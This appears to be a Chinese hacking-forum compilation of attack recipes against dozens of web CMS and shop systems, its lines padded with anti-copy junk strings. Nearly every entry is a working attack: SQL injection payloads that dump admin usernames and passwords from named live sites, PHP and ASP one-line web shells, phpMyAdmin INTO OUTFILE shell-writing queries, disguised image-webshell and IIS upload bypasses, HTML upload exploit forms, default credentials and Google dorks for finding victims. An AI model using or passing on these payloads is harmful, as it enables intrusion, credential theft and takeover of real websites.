启航企业建站系统 cookie注入漏洞通杀所有版本
* O1 i: E6 T @- @* {2 E5 L3 _5 ?( D' Y0 _. }( ~- o9 H
直接上exploit:
) i; F5 I# ~+ F; y' } mjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));# C' l) c' u g$ \& U2 F3 `! @
test:http://www.tb11.net/system/xitong/shownews.asp?id=2100 D: X" |( [8 Z5 d( G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ I, B- ?" K# \9 u( X3 G
Asprain论坛 注册用户 上传图片就可拿到webshell
' |6 @8 T& E- `/ I: \- ~
2 v9 L2 h3 a( v. b( J8 s- U) WAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
0 M$ L% A* y: M2 a7 u0 X1.txt存放你的一句话马 如:<%execute(request("cmd"))%>* }- v! K2 _( F, S8 y
2.gif 为一小图片文件,一定要小,比如qq表情图片
, t: G* m" P* k4 q! s# c1 a3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
- G7 V3 @' t% G4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了6 P$ w8 c9 s% |4 A- o
5.q.asp;.gif
- X$ |! i0 a- U# ugoogle:Powered by Asprain$ u; {0 D9 s6 O6 J# g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" i0 g8 A2 ?2 b( s/ p; W
: E5 e+ c- ^2 y. b% K
ShopNum1全部系统存在上传漏洞。
9 v& L- h# f0 D' ?% s- T2 i/ Z H- m. H2 k& a+ u, \
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。+ T+ W) J; P8 O z) l9 n
按说明 提示登录后台。。7 L$ D4 R, O- R1 ~4 J# y
在后台功能页面->附件管理->附件列表
6 d5 ^, O0 g0 Z# Y% ?- d可以直接上传.aspx 后缀木马% V" P8 F, V4 i
http://demo.shopnum1.com/upload/20110720083822500.aspx0 J, h6 Z/ e7 \1 B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 n7 a$ H) G& x1 n7 I
& a0 Z0 | m; R1 l; q0 Z6 C2 _牛牛CMS中小企业网站管理系统 上传漏洞4 X) P( V, |$ `- N4 q# G
# q, J5 `/ h4 w/ `' I' t z
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% G# G; b5 ^. i; X' H3 l后台:admin/login.asp u7 \9 P" t% o9 C- ]3 B
ewebeditor 5.5 Nday8 b3 r+ M) D, ^6 L! H
exp:
& g4 X+ X1 J) `( M<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?2 v! w" s/ a1 P
<input?type=file?name=uploadfile?size=100><br><br>?
+ @; O% q9 |7 l$ Y<input?type=submit?value=upload>?% b6 k( p8 H! m$ ?' n1 I8 B
</form>
" i" w2 J" l) a) ]) A( v% X" O& cps:先上传小马.
, q T$ d4 L# N. Tinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏( l: B" j+ q8 P
0 X+ \2 _8 O, ^$ m! i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 l; O) a/ q/ o
7 k: n K( K$ g. f Z! Z: A
YothCMS 遍历目录漏洞
' t. C. i' N9 C* w- M6 M8 U% y# `2 c( c% O3 t/ a- U
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
0 k. z3 n* z- n6 j默认后台:admin/login.asp7 n8 i5 S; q+ x4 f4 ?7 r
遍历目录: d# {: R% d( h: Q% ` M' q! T6 m
ewebeditor/manage/upload.asp?id=1&dir=../ K! z7 E8 L& |! k7 ? n, ]
data:5 F7 ]* F3 X/ {& j5 B3 ]' f2 v" k
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
9 y- M% r: R. s( Q4 n4 G8 P* e( |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# x" d6 R5 u2 h0 z0 Z& O
9 e C8 O) m; }2 Q ZNet112企业建站系统 1.0+ S: l3 {& H; Z) |+ h
; l: J. p8 D- N6 E' O: h) w+ n% F
源码简介:
6 n0 K- r7 T% \! P6 J: dNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
8 g8 C% R* b! X3 B7 c6 E4 M添加管理员:& I9 i8 X5 G- t ~* y0 N% n+ U
http://www.0855.tv/admin/admin.asp?action=add&level=2
V! ^, K- d0 C1 L: {/ j. H其实加不加都不是很重要,后台文件都没怎么作验证。
# k& g, M' S" N上传路径:
5 H' L5 N5 A) L) D4 H6 Zhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
1 F' x4 s. L0 S! y7 R+ J# uhttp://www.0855.tv/inc/Upfile.asp?Stype=2
. u/ l2 b7 c& l" O怎么利用自己研究。
+ O. w8 x3 t4 g( `% U b; c7 p遍历目录:
; k5 ~8 [$ h$ chttp://www.0855.tv/admin/upfile.asp?path=../..
2 @. ?% ^& l4 u- z; J, J& M+ p如:- P# h4 M, F1 A$ J7 e
http://www.0855.tv/admin/upfile.asp?path=../admin" y) R# c$ j" ]$ @
http://www.0855.tv/admin/upfile.asp?path=../data# G5 L% @: V# x, \0 @; b8 c* {
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 s. J; h1 c& B6 Y. r
) P8 ]* `2 b q# N易和阳光购物商城通杀 上传漏洞0 {* L9 N0 h* w8 @! l5 |
- ]4 V" o! n# a2 C \前提要求是IIS6.0+asp坏境。: \. V' `9 r% T+ R( S: t$ ~+ Q
漏洞文件Iheeo_upfile.asp 7 z. e- e( r1 o; N& H
过滤不严.直接可以iis6.0上传* ~' f% a/ V4 }8 E5 G h0 M/ d
把ASP木马改成0855.asp;1.gif& M% `+ X. {6 L* V) d0 e. |. Y
直接放到明小子上传
' Z3 y6 c1 {2 |5 R* J" v, y9 H( w$ lGoogle搜索:inurl:product.asp?Iheeoid=
8 x: Q, }- [4 i% c# E' S6 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 Y& b9 I( m/ w7 N, Z: N" R
) D" [/ ]! r* _+ O
phpmyadmin后台4种拿shell方法: A/ y, s/ ~0 I8 c
8 q/ O C. l& ?1 u, H2 C
方法一:1 X1 m6 u) B1 U7 x% G) |& H9 ?
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );! q5 A" K( C" v! X" s: b N6 X; w
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');6 i( u3 {1 W, X* }/ H& }
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
2 P( B* I- k& }! l6 Z1 x----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php" l" s( ~- {4 E5 R. @
一句话连接密码:xiaoma/ ]$ E0 `. T/ f" Q' S' W
方法二:
+ n: |) d y2 G; F0 _Create TABLE xiaoma (xiaoma1 text NOT NULL);
4 C- W8 w% n& sInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
8 d0 P; m* ?' p1 D/ Cselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
% q, N6 \8 u6 G s) VDrop TABLE IF EXISTS xiaoma;
8 O7 {: k. z7 u( ~/ F+ K; s! M8 b方法三:% c. [" d" L+ r( }' u' O
读取文件内容: select load_file('E:/xamp/www/s.php');
9 s! F" f4 H( ]! e6 \写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ R% U0 V$ w: gcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 y- R: D7 c' z2 I: D8 B4 X方法四:- @: K5 k3 x5 k: o1 [/ ], P" l
select load_file('E:/xamp/www/xiaoma.php');0 g4 E3 n% K* n2 d, `: O# Y7 r U4 d
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" ]. F& A! ^" K- U然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
: V, e& n$ E. m% ~" Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 J2 w; d5 t8 M- c4 f
* ?- Y, f; c0 O9 n传信网络独立开发网站源码0day漏洞
' E; T: n4 |+ z6 _6 f9 ? i5 o3 f2 z: p2 x
后台system/login.asp
- k5 V6 d/ y L8 o进了后台有个ewebeditor
3 \, e/ ~' D* }) C; @, @/ mGoogle 搜索inurl:product1.asp?tyc=
9 r4 U' o* g- N M6 q% z4 r+ T/ P' T编辑器漏洞默认后台ubbcode/admin_login.asp2 _. |; V0 U% t7 } E: g. N8 j
数据库ubbcode/db/ewebeditor.mdb0 ~" @' ^' x3 ~6 h" t& `+ `
默认账号密码yzm 1111115 I$ V& W" z+ J
) [6 h; B9 ?' D @1 _+ R拿webshell方法
, p& Q5 E& j% _5 M. g; K登陆后台点击“样式管理”-选择新增样式 ' y- w/ A9 G ]9 a% q2 A
样式名称:scriptkiddies 随便写 : @- H3 `9 ?' V$ Y
路径模式:选择绝对路径 9 h. \! m2 C! F i5 h, e5 c* ?: O
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx; q8 e0 U7 y- h8 Q( S
图片类型比如就是我们要上传的ASP木马格式/ O9 ^; m- C' L, x9 n: @# h
上传路径:/2 J6 ^3 s6 K. ]" N, \
图片限制:写上1000 免的上不了我们的asp木马/ S" ^4 A+ [+ \ ~$ d+ T3 i
上传内容不要写: M) S: G( }* Q1 O3 T2 Z0 U
可以提交了
. L7 g8 a9 s7 w3 S样式增加成功!
# n& w5 z! U5 H( d返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
$ C( ^# C& q0 d# |" C7 y6 `按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
% @/ L" W: v4 @4 D( L' N: K1 x网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies% u6 j0 |7 Z; S& l, W' c' W4 l: g
上ASP木马 回车 等到路径 }$ P2 H: s$ H
8 C) q+ U) E8 M1 _, \9 r后台:system/login.asp
9 [; d$ [# f! \6 o5 LExp:
* }3 U% c0 U, V# i2 r" yand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
6 F0 D: l) Q: `( v- w* K$ I& r测试:
9 t! ~+ j- f0 e# _# n Nhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master& ~$ U6 `- j: v! G' J6 i8 c; X
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master* ~4 k7 Q }! t: c1 p- [
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 H4 ]) S8 Z: d2 a/ u" _6 G
$ K" w" Q V8 u- L" }# m* {
foosun 0day 最新注入漏洞6 n K b2 j; f( i' p
( ?5 x2 E9 h( T* O( G
漏洞文件:www.xxx.com/user/SetNextOptions.asp6 f" i0 V( ]9 C( `, X+ M2 X: }
利用简单的方法:
( E% ?! W' M/ n3 z# m1 ?暴管理员帐号:
) h% j: r; \4 B/ V& Fhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin) \$ w1 P# u s. Y+ I" n# h7 q! e, O8 a
暴管理员密码:! k/ B$ S2 a7 p
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,9 Q/ @0 v7 |7 o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- `1 Q e! @+ R5 m2 D" G) `) N6 H$ S* P
网站程序的版权未知!
7 l; o+ A- P ?& k5 Z6 Q5 f) [. Y) N1 C& c4 X( R+ }
默认网站数据库:
! h7 B% T/ x$ G H: d: Owww.i0day.com/data/nxnews.mdb
) R' G! C% W8 w2 w# ]ewebeditor 在线编辑器:7 _3 W% ^$ x9 t8 x. o6 B1 ?' U
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
7 V& y7 C, P* V0 \登录地址:ewebeditor/admin_login.asp
. j2 J6 \* {& u6 i/ G* _默认密码:admin admin
( p7 Z p& o$ _! y3 ~登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data+ w" a. S8 F/ q0 T+ L
0 ]6 K: h% p! z: [2 J' sSql注入漏洞:$ g: T$ D! F5 U+ ?
http://www.i0day.com/detail.asp?id=123 _) P6 l, U6 D
exp:
) y; k( I/ O# q) d: K2 t/ p( eunion select 1,admin,password,4,5,6,7,8 from admin
# u- x: O/ k* a7 H4 w8 F/ L爆出明文帐号/密码+ O+ P2 T# Y* v. j' j& ?- N$ ]& ^
@8 X' T( E2 Z9 M* y; X9 P上传漏洞:/ n$ K+ m, M% x% g: d7 P6 t
后台+upfile.asp
0 I$ a) m- h2 F) `# v如:
& {; s/ T, y, d4 ?: fhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
2 Y; w( ^) U7 O" W& e2 ?shell的地址:网址+后台+成功上传的马
! o7 q( k6 A$ fgoogle:inurl:news.asp?lanmuName=
3 C$ z& o! F$ k" l4 h------------------------------------------------------------------------------------------------------------------------------------------------------------------------: t. T' `7 P- |9 V4 s! l
' r. C' C( Z B
dedecms最新0day利用不进后台直接拿WEBSHELL
9 z5 \- Z4 W) x) b7 w& Y, ~8 f8 v/ j$ v( I# F! v) D
拿webshell的方法如下:: Y1 r8 }! f" P X0 b. Q
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.: U( j2 n: }) Q
前题条件,必须准备好自己的dede数据库,然后插入数据:) ?" l0 B9 B- ~
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); % x( _" S! e- Y# ?: T b' n: x
( O5 g" ^: n) k% n3 T# P+ y
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。( G5 ?9 x7 c. S j
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
# s& s- `5 F) q4 S0 _0 a<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
: z+ V$ ^' Z; d. v1 L. S U# u$ ^<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
/ @9 h1 \9 T. g, X<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
( c' p) K7 s, _! O& h) F9 x<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />1 m( D$ b$ Y7 |- d* ^/ R
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />' e0 S; B% T. L. G1 t" @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />; R( g2 I$ S1 i6 `7 x
<input type="text" value="true" name="nocache" style="width:400">
, J! a- S4 V k- P<input type="submit" value="提交" name="QuickSearchBtn"><br />7 o5 c' l) Y1 u+ I
</form>
; T6 k8 g; l* l, G* c+ d<script>
7 m" ]9 w! O- l& n' u4 I- O4 G5 ifunction addaction()9 J1 O& @& D7 K+ {1 l
{
$ b) q2 J/ g) Y6 z& Ndocument.QuickSearch.action=document.QuickSearch.doaction.value;
5 F" d! n- v. t2 m& C4 K9 P1 T6 b}
+ L, w0 Q K5 R" U3 e% M</script>
) V$ Y1 q E7 P; }5 e) k8 G$ s-----------------------------------------------------------------------------------------------------------------------------------------------9 r" U" ?$ S6 V: {8 Y
. @! i2 Q0 k, Q. o0 s9 B
dedecms织梦暴最新严重0day漏洞
/ R+ C* h0 n; ]* h* sbug被利用步骤如下:
6 x0 G3 Z8 `9 O7 lhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. q6 v3 W& r: n; }& ~( @
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。5 q' T! _" j4 ^+ Y" t
-------------------------------------------------------------------------------------------------------------------------------------------
3 s l0 \0 ^7 n: p" P8 G- g* i5 S# P9 n& f8 W# @0 y. u( X6 b
多多淘宝客程序上传漏洞 ' J( P% l2 Z, c6 z
漏洞页面:
# K6 w( `! Z0 Sadmin\upload_pic.php
1 O6 e+ U9 J- d, z: D传送门:
3 x1 G! q; c' g! Lhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1: |" [4 j. {+ b, X% @8 q3 d* A. k8 T
PS:copy张图片马 直接 xxx.php 上传抓包地址!; }' F& i" m: l- h$ K
------------------------------------------------------------------------------------------------------------------------------------------------------
! w, m6 R( s0 n
H+ E5 F& S+ V+ l/ h& [无忧公司系统ASP专业版后台上传漏洞
" I$ ^/ A& G5 H( P漏洞文件 后台上传* P$ ^6 [" \" M! v
admin/uploadPic.asp
; q+ T9 M/ _5 x- K) k漏洞利用 这个漏洞好像是雷池的
# _, V6 J( s6 N" P! c' C8 o5 Whttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
6 _! D, i0 V; O等到的webshell路径:5 S2 i5 f9 B* n4 H/ r x7 Q" z+ R
/UploadFiles/scriptkiddies.asp;_2.gif
# ~# ?4 Z% x, q---------------------------------------------------------------------------------------------------------------------------------------------------$ K' [1 i8 I' Q7 {
" V* ~9 [3 ~6 F住哪酒店分销联盟系统2010
- n/ X6 G0 g& r+ j2 Z3 X8 YSearch:' d+ T0 O9 L: [! c
inurl:index.php?m=hotelinfo
( G' g' u3 b5 M5 Ohttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin( K) H. n& g3 l o( C) j: C" h
默认后台:index.php?m=admin/login1 N, |! W& `' |5 w
--------------------------------------------------------------------------------------------------------------------------------------------------
* E* C0 e+ y8 b2 `; Z* a
. d: p6 N2 n. m, t1 r6 tinurl:info_Print.asp?ArticleID=
. m. t3 b8 U2 L7 K$ _5 @" E6 l; x后台 ad_login.asp
! w2 n" x% |: W爆管理员密码:
( l6 X- B0 M" U! I2 R, |2 `. funion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin8 A9 \2 N4 }* p3 O4 E7 d! D
------------------------------------------------------------------------------------------------------------------------------------------------------------( o3 E. x& a+ s: _2 t# X5 S
% G, F G2 I+ B. E* Y0 u/ \搜索框漏洞!
2 j( j* j3 l8 z%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='2 _: R. ?3 k6 A
--------------------------------------------------------------------------------------------------------------------------------------------------------. E; R; D4 h6 j. X) S
0 [. l% k+ @( Q, I( ~0 x! t) X6 y
关键字:) ^) w+ w9 Q& r) s' C" Y& _
inurl:/reg_TemletSel.asp?step=2& r- _# u1 v( h+ Q* m
或者
/ R1 P) s3 ? V, ^9 C( v. ?电子商务自助建站--您理想的助手; F6 f' ?" y5 E
-------------------------------------------------------------------------------------------------------------------------------------------------
* F' ?1 Y% X, B6 P/ S5 a; E% }) _2 w! J' @. E0 l' R: E
iGiveTest 2.1.0注入漏洞
, }! Y; g7 e$ f' Q1 z. WVersion: <= 2.1.02 h2 y; j' V( i% ^1 K c! d$ H" d7 l
# Homepage: http://iGiveTest.com/4 ~, {/ H) I% \ x' i
谷歌关键字: “Powered by iGiveTest”
9 `- H, H3 |4 q: l随便注册一个帐号。然后暴管理员帐号和密码
7 r; ^! z1 C6 C8 \2 ~' U5 Ohttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1! D0 F# t5 r7 `7 G8 |
------------------------------------------------------------------------------------------------------------------------------------------------
9 J1 A+ C: a' ~' ?" z2 k; u( g6 t7 s! y
CKXP网上书店注入漏洞4 t! H! D- \4 H, Q
工具加表:shop_admin 加字段:admin3 ?6 A9 c" O4 b
后台:admin/login.asp # r. B# _2 j" ^6 q% Y
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
3 q7 P9 j8 `! N8 uinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息1 N7 ?+ Y7 K4 H& `! L2 G; |3 Z0 P& o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! N0 M6 {; G, Z2 P4 t6 P
$ W! U" l/ i& r. T; W' M: D
段富超个人网站系统留言本写马漏洞% a _7 F8 Q4 r# M$ z( R
源码下载:http://www.mycodes.net/24/2149.htm+ J/ A' a. _* t0 V1 C) U; y# M
addgbook.asp 提交一句话。
) K1 N+ j% A; q连接: http://www.xxxx.tv/date/date3f.asp
' `0 f/ q4 g1 D8 ugoogle:为防批量,特略!
9 j( I% k$ z! r0 ~$ f3 `-------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 Z% H* X1 _7 X; \' a! f0 T
9 Y: n* F! g1 P$ `! J
智有道专业旅游系统v1.0 注入及列目录漏洞
% ~2 q9 @& r8 ?, s. a J" V默认后台路径:/admin/login.asp
7 Y" b' _# {7 I! ^5 o1 n% w默认管理员:admin
) l; _, [ ?" t$ ^0 d+ A4 b默认密码:123456; U" ?+ }$ |" d) [
SQL EXP Tset:
# C; a& T- O# o! Z# ?7 r8 ?6 m6 jhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
/ |% h$ \, p* f3 W; L4 g) @------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, c$ C Z6 h6 o( B0 b1 Q9 z: ], M0 c% b3 g- w, k$ ^$ w; Z4 g
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
3 Z- E d9 H/ D( _1 v7 JEXP:
8 { K( s1 \" {" y* {<title>eWebeditoR3.8 for php任意文件上EXP</title>/ O% C w( [3 ?/ {4 N( x7 _( n
<form action="" method=post enctype="multip
2 K' w' \( h4 V# g5 xart/form-data">
3 }. C) ^5 {/ L7 [# W9 P0 z<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
; I9 Z s4 J. y0 X2 QURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
6 E- Q% v. C& K- z9 C" ]# T<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> + i! Z5 P2 P# `$ H, d4 s, T" R
file:<input type=file name="uploadfile"><br>
, G Z+ w$ @) _' W! ]/ K/ }. w<input type=button value=submit onclick=fsubmit()>
' q' t; @9 n8 |% u2 c0 T4 k</form><br> . ]3 K1 J2 Y4 Q! d- e6 s
<script>
9 e: B: s9 S( @7 u. sfunction fsubmit(){ 5 Q+ J( Y- W4 A9 _3 ~
form = document.forms[0];
' Z/ c! c/ ?; }7 H1 B1 Aform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
% e" x/ |( A7 w! n& ^+ V1 Xalert(form.action);
" b/ t* P1 `% b0 j: Yform.submit(); , m0 P2 u) j! e( [
} % u+ ?- C3 d; ?6 i$ D8 l/ K |* e5 b
</script>* h( r& q% R3 h
注意修改里面ewebeditor的名称还有路径。! ]1 e; [8 {6 Y$ Y! V1 n- R
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ |+ C9 {3 c `$ ~0 C
. i6 ?! q: y' q
提交’时提示ip被记录 防注入系统的利用
: m! \ M N1 h& T' |1 e3 | k网址:http://www.xxx.com/newslist.asp?id=122′9 }8 B+ I' l! K- ?& ?
提示“你的操作已被记录!”等信息。( P3 i- c# l) a7 `
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。3 v' i/ p6 K6 M' T5 V( O4 [
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ?" J8 Z: w+ U4 I9 [
$ h" @5 x( B, J+ e1 a9 l3 S% r西部商务网站管理系统 批量拿shell-0day* L0 j( k/ ]' {7 @
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb . H* ?; d( Z+ m, ?) W
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
1 ?5 V; R0 E* t: y0 I; }0 s2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
3 [# \3 ~! s, {3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
4 }$ G9 v# J* Z4 R' h, q' ~& Z---------------------------------------------------------------------------------------------------------------------------------------------------------------------------" f- a5 t! {% ^
' t n4 [% ?5 c
JspRun!6.0 论坛管理后台注入漏洞5 H' E. D9 |) G! Y# c* g# \6 s
% h8 ?: o& Z: i/ E( Q! o! G
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:: M. `2 |0 O" Z/ {" d, Y* S8 n
JspRun!6.0 ( e6 o* A0 ~% s" {) p4 b
漏洞描述:
/ v" r! A% Q" r" x2 W# VJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。! k4 \2 z) l, E! l0 T! E1 E; ^
在处理后台提交的文件中ForumManageAction.java第1940行8 J D1 B- y" u* ?* j0 ]2 I
String export = request.getParameter("export");//直接获取,没有安全过滤. d }- ?+ D+ m4 m# M
if(export!=null){
. e, W* O+ n+ @9 u- [. _List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
5 |; {9 Y3 C4 A' ~if(styles==null||styles.size()==0){# k% A( z I+ }: E J
<*参考 m2 ~( U5 E7 C8 y7 r' g1 ]
nuanfan@gmail.com" [/ X9 A5 N- u' k7 Q: n) F
*> SEBUG安全建议:. {+ g+ K# F- m& w9 V
www.jsprun.net) [, ~. J# g% c" L |) g
(1)安全过滤变量export
+ X' q) p6 ~0 z(2)在查询语句中使用占位符5 i# Z+ i0 N, I+ `' @8 f3 ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ g6 ^* B: E. J8 }
- F% e0 z" N: G: N7 F乌邦图企业网站系统 cookies 注入
2 I) L6 e0 ^; |0 R
) ~# \" _5 I$ `4 @( u2 K' t程序完整登陆后台:/admin/login.asp8 I! |+ @, u1 e* S/ E8 A: ^% u
默认登陆帐号:admin 密码:admin888
& ? N5 Y' k5 l+ @2 X语句:(前面加个空格)9 e; a. Q& ^/ y3 g. i
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
5 p. u( X8 N1 I或者是16个字段:6 P7 S# w1 u5 T) k. G
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
: ?% D6 x" u! l# g爆不出来自己猜字段。
e! {& S) N& @/ u9 E/ S: ^! ^& o注入点:http://www.untnt.com/shownews.asp?=88$ \% l. f$ K; L- q7 N
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
5 q! Z* b! P6 G7 R( A1 L7 `关键字:
' L9 a1 x7 C S5 r+ x ~inurl:shownews?asp.id=
X4 m: G! V7 n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& o8 H; i V4 D1 [- m0 g9 W) M( C8 V0 J0 Z4 j, X7 h
CKXP网上书店注入漏洞
8 l; W4 F: m4 ` B, R( Q5 l* i; ^# L k' A
工具加表:shop_admin 加字段:admin
2 E. B) c9 P$ T" A后台:admin/login.asp $ v+ t7 ]9 }# f+ e: W
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/+ N/ N5 }$ {/ o! C% j* K5 H
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息6 ^+ r3 X2 \6 t) N: B. ? n
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% d: n# O# g' H; _3 G3 q7 W4 }2 K( p) m6 p' \
YxShop易想购物商城4.7.1版本任意文件上传漏洞
% m3 b: s1 K- Y v$ K+ R
5 d5 O F& e% N; lhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx# G8 h, H9 l& Q# [% {
跳转到网站根目录上传任意文件。2 h& L+ O2 V+ ^. `
